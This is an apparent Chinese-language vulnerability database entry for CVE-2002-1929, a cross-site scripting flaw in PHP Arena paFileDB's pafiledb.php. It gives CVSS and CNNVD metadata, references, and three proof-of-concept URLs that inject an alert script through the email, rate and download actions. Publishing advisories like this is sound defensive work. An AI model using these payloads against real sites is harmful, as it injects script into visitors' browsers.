PHP Arena PAFileDB Email To Friend跨站脚本漏洞

PHP Arena PAFileDB Email To Friend跨站脚本漏洞

漏洞ID 1107053 漏洞类型 跨站脚本
发布时间 2002-10-21 更新时间 2005-10-20
图片[1]-PHP Arena PAFileDB Email To Friend跨站脚本漏洞-安全小百科CVE编号 CVE-2002-1929
图片[2]-PHP Arena PAFileDB Email To Friend跨站脚本漏洞-安全小百科CNNVD-ID CNNVD-200212-099
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/21957
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-099
|漏洞详情
PHPArenapaFileDB1.1.3到3.0版本的pafiledb.php存在跨站脚本(XSS)漏洞。远程攻击者借助(1)rate,(2)email,或者(3)downloadactions的查询字符串注入任意web脚本或者HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/6018/info

PHP Arena paFileDB is prone to cross-site scripting attacks.

An attacker may construct a malicious link to the vulnerable script which contains arbitrary HTML and script code. If this link is visited by a web user, the attacker-supplied code will execute in their web client in the security context of the paFileDB site.

This issue is in the "Email to Friend" function of the paFileDB script. 

http://www.example.com/downloads/pafiledb.php?action=email&id=4?"<script>alert('Testing')</script>" 

http://www.example.com/downloads/pafiledb.php?action=rate&id=4?"<script>alert('Testing')</script>" 

http://www.example.com/downloads/pafiledb.php?action=download&id=4?"<script>alert('Testing')</script>"
|参考资料

来源:BID
名称:6020
链接:http://www.securityfocus.com/bid/6020
来源:BID
名称:6019
链接:http://www.securityfocus.com/bid/6019
来源:BID
名称:6018
链接:http://www.securityfocus.com/bid/6018
来源:XF
名称:pafiledb-script-xss(10416)
链接:http://www.iss.net/security_center/static/10416.php
来源:www.securiteam.com
链接:http://www.securiteam.com/unixfocus/6J00Q0A5PK.html

相关推荐: PlatinumFTPServer Dot-Dot-Slash Directory Traversal Vulnerability

PlatinumFTPServer Dot-Dot-Slash Directory Traversal Vulnerability 漏洞ID 1101065 漏洞类型 Input Validation Error 发布时间 2003-01-07 更新时间 20…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享